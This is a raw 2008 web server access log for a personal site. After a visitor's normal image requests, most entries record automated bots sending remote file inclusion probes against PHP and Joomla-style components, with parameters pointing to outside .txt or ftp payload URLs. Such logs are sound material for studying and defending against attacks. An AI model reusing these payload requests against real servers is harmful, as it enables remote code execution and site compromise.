68.77.21.242 - - [10/Jul/2008:19:48:37 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:37 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:37 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:37 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:39 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:39 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:40 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:40 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
87.106.98.71 - - [10/Jul/2008:19:49:03 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
87.106.98.71 - - [10/Jul/2008:19:49:03 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
77.221.130.6 - - [10/Jul/2008:19:49:12 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
77.221.130.6 - - [10/Jul/2008:19:49:12 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
68.77.21.242 - - [10/Jul/2008:19:49:55 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:49:55 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:49:55 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:49:56 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
87.239.10.63 - - [10/Jul/2008:19:50:24 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
87.239.10.63 - - [10/Jul/2008:19:50:24 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
87.106.101.24 - - [10/Jul/2008:19:51:44 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
87.106.101.24 - - [10/Jul/2008:19:51:45 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
200.143.15.240 - - [10/Jul/2008:19:55:15 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
200.143.15.240 - - [10/Jul/2008:19:55:15 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
89.111.173.117 - - [10/Jul/2008:19:55:19 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
89.111.173.117 - - [10/Jul/2008:19:55:19 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
195.34.175.196 - - [10/Jul/2008:19:57:29 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/botid.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.34.175.196 - - [10/Jul/2008:19:57:30 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/botid.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.22.89.194 - - [10/Jul/2008:19:58:44 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://futureikon.com/cache/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.812"
64.22.89.194 - - [10/Jul/2008:19:58:44 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://futureikon.com/cache/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
207.58.170.49 - - [10/Jul/2008:19:59:12 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://imageserenity.com/proofing/albums/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
207.58.170.49 - - [10/Jul/2008:19:59:12 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://imageserenity.com/proofing/albums/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
217.160.200.228 - - [10/Jul/2008:20:01:41 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
217.160.200.228 - - [10/Jul/2008:20:01:41 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
207.7.108.242 - - [10/Jul/2008:20:01:55 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
207.7.108.242 - - [10/Jul/2008:20:01:55 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
207.7.108.242 - - [10/Jul/2008:20:01:56 -0500] "GET //skin/zero_vote/error.php?dir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
207.7.108.242 - - [10/Jul/2008:20:01:56 -0500] "GET //skin/zero_vote/error.php?dir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
87.119.200.248 - - [10/Jul/2008:20:02:07 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.asa.ba/eng//administrator/components/com_chronocontact/excelwriter/Writer/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
80.93.62.99 - - [10/Jul/2008:20:02:22 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
80.93.62.99 - - [10/Jul/2008:20:02:23 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
75.125.143.162 - - [10/Jul/2008:20:03:01 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://findaone.com/ray/modules/im/sql.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
75.125.143.162 - - [10/Jul/2008:20:03:01 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://findaone.com/ray/modules/im/sql.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
62.44.72.247 - - [10/Jul/2008:20:07:18 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
62.44.72.247 - - [10/Jul/2008:20:07:19 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
88.255.236.6 - - [10/Jul/2008:20:09:00 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
88.255.236.6 - - [10/Jul/2008:20:09:01 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
203.177.42.133 - - [10/Jul/2008:20:11:13 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
203.177.42.133 - - [10/Jul/2008:20:11:15 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
200.68.51.152 - - [10/Jul/2008:20:11:44 -0500] "GET /logs/access_log.1207785600//?path%5Bdocroot%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
200.68.51.152 - - [10/Jul/2008:20:11:45 -0500] "GET //?path%5Bdocroot%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
200.68.51.152 - - [10/Jul/2008:20:11:58 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 200 90880 "-""libwww-perl/5.805"
81.176.67.60 - - [10/Jul/2008:20:14:32 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.community.nigeria.com//forums/Packages/data/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
81.176.67.60 - - [10/Jul/2008:20:14:32 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.community.nigeria.com//forums/Packages/data/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
70.87.197.18 - - [10/Jul/2008:20:16:36 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
70.87.197.18 - - [10/Jul/2008:20:16:36 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
202.174.84.65 - - [10/Jul/2008:20:16:45 -0500] "GET /logs/toolbar.php?dirDepth=http://creativ-s.ru/tmp/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
202.174.84.65 - - [10/Jul/2008:20:16:45 -0500] "GET /toolbar.php?dirDepth=http://creativ-s.ru/tmp/id.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
202.174.84.65 - - [10/Jul/2008:20:16:46 -0500] "GET /logs/toolbar.php?dirDepth=http://creativ-s.ru/tmp/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
202.174.84.65 - - [10/Jul/2008:20:16:47 -0500] "GET /toolbar.php?dirDepth=http://creativ-s.ru/tmp/id.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
59.126.172.166 - - [10/Jul/2008:20:21:03 -0500] "GET /logs/access_log.1207785600/%22/modules.phphttp://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
59.126.172.166 - - [10/Jul/2008:20:21:04 -0500] "GET /%22/modules.phphttp://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
59.126.172.166 - - [10/Jul/2008:20:21:04 -0500] "GET /logs/%22/modules.phphttp://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
81.176.67.60 - - [10/Jul/2008:20:25:56 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
81.176.67.60 - - [10/Jul/2008:20:25:56 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
83.98.156.151 - - [10/Jul/2008:20:26:42 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.listpage.net/cgi-bin/raid.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
83.98.156.151 - - [10/Jul/2008:20:26:42 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.listpage.net/cgi-bin/raid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.106.101.24 - - [10/Jul/2008:20:27:44 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
87.106.101.24 - - [10/Jul/2008:20:27:44 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
208.68.3.10 - - [10/Jul/2008:20:28:01 -0500] "GET /logs/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.happyfacesadface.net/ray/readme1.txt%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
208.68.3.10 - - [10/Jul/2008:20:28:01 -0500] "GET /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.happyfacesadface.net/ray/readme1.txt%0D?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
80.93.62.99 - - [10/Jul/2008:20:28:54 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.93.62.99 - - [10/Jul/2008:20:28:55 -0500] "GET //faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
200.11.67.242 - - [10/Jul/2008:20:29:31 -0500] "GET /logs//include/write.php?dir=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
200.11.67.242 - - [10/Jul/2008:20:29:31 -0500] "GET //include/write.php?dir=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
81.176.67.60 - - [10/Jul/2008:20:29:45 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
81.176.67.60 - - [10/Jul/2008:20:29:45 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
217.160.200.228 - - [10/Jul/2008:20:30:40 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
217.160.200.228 - - [10/Jul/2008:20:30:40 -0500] "GET //faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
59.126.172.166 - - [10/Jul/2008:20:31:08 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
59.126.172.166 - - [10/Jul/2008:20:31:09 -0500] "GET //faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
66.98.250.45 - - [10/Jul/2008:20:32:12 -0500] "GET /logs//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.elektropoechhacker.at/mambo/bajo.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
66.98.250.45 - - [10/Jul/2008:20:32:13 -0500] "GET //pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.elektropoechhacker.at/mambo/bajo.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
74.6.8.88 - - [10/Jul/2008:20:32:19 -0500] "GET /logs/access_log.1176595200 HTTP/1.0" 200 136086 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
75.127.70.16 - - [10/Jul/2008:20:33:44 -0500] "GET /logs//errors.php?error=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
75.127.70.16 - - [10/Jul/2008:20:33:44 -0500] "GET //errors.php?error=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
207.7.108.242 - - [10/Jul/2008:20:33:51 -0500] "GET /logs/index.php?pagina1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.7.108.242 - - [10/Jul/2008:20:33:51 -0500] "GET /index.php?pagina1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
80.38.101.68 - - [10/Jul/2008:20:34:24 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 305 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.38.101.68 - - [10/Jul/2008:20:34:25 -0500] "GET /logs/errors.php?error=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 299 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.38.101.68 - - [10/Jul/2008:20:34:25 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 300 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.38.101.68 - - [10/Jul/2008:20:34:26 -0500] "GET /errors.php?error=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 294 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
66.98.250.45 - - [10/Jul/2008:20:36:08 -0500] "GET /logs//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.elektropoechhacker.at/mambo/bajo.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
66.98.250.45 - - [10/Jul/2008:20:36:08 -0500] "GET //pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.elektropoechhacker.at/mambo/bajo.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
212.34.140.215 - - [10/Jul/2008:20:36:14 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
212.34.140.215 - - [10/Jul/2008:20:36:14 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
216.246.7.92 - - [10/Jul/2008:20:36:25 -0500] "GET /logs//booth.php?include_path=http://www.listpage.net/cgi-bin/raid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
216.246.7.92 - - [10/Jul/2008:20:36:25 -0500] "GET //booth.php?include_path=http://www.listpage.net/cgi-bin/raid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
189.62.145.42 - - [10/Jul/2008:20:37:35 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.800"
189.62.145.42 - - [10/Jul/2008:20:37:35 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.800"
81.187.167.130 - - [10/Jul/2008:20:38:01 -0500] "GET /logs/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.happyfacesadface.net/ray/readme1.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
81.187.167.130 - - [10/Jul/2008:20:38:02 -0500] "GET /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.happyfacesadface.net/ray/readme1.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
83.98.156.151 - - [10/Jul/2008:20:39:39 -0500] "GET /logs//booth.php?include_path=http://www.listpage.net/cgi-bin/raid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.98.156.151 - - [10/Jul/2008:20:39:39 -0500] "GET //booth.php?include_path=http://www.listpage.net/cgi-bin/raid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
70.87.197.18 - - [10/Jul/2008:20:40:17 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
70.87.197.18 - - [10/Jul/2008:20:40:17 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
62.44.72.247 - - [10/Jul/2008:20:40:40 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
62.44.72.247 - - [10/Jul/2008:20:40:40 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
87.238.199.56 - - [10/Jul/2008:20:40:54 -0500] "GET /logs/!scanhttp://www.injoyusa.com/pw.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
87.238.199.56 - - [10/Jul/2008:20:40:55 -0500] "GET /!scanhttp://www.injoyusa.com/pw.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
212.34.140.215 - - [10/Jul/2008:20:41:19 -0500] "GET /logs/!scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
212.34.140.215 - - [10/Jul/2008:20:41:19 -0500] "GET /!scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
88.255.236.6 - - [10/Jul/2008:20:42:12 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
88.255.236.6 - - [10/Jul/2008:20:42:14 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
74.6.8.88 - - [10/Jul/2008:20:42:25 -0500] "GET /logs/access_log.1173312000 HTTP/1.0" 200 202873 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
59.126.172.166 - - [10/Jul/2008:20:42:34 -0500] "GET /logs//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
59.126.172.166 - - [10/Jul/2008:20:42:35 -0500] "GET //pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
195.34.175.196 - - [10/Jul/2008:20:42:48 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://cabinet-chapuis.info/graphisme/images/botid.txt???? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
195.34.175.196 - - [10/Jul/2008:20:42:48 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://cabinet-chapuis.info/graphisme/images/botid.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.238.199.56 - - [10/Jul/2008:20:43:12 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.803"
87.238.199.56 - - [10/Jul/2008:20:43:12 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
80.93.62.99 - - [10/Jul/2008:20:43:42 -0500] "GET /logs//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
80.93.62.99 - - [10/Jul/2008:20:43:42 -0500] "GET //pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
213.235.215.34 - - [10/Jul/2008:20:44:33 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
213.235.215.34 - - [10/Jul/2008:20:44:34 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
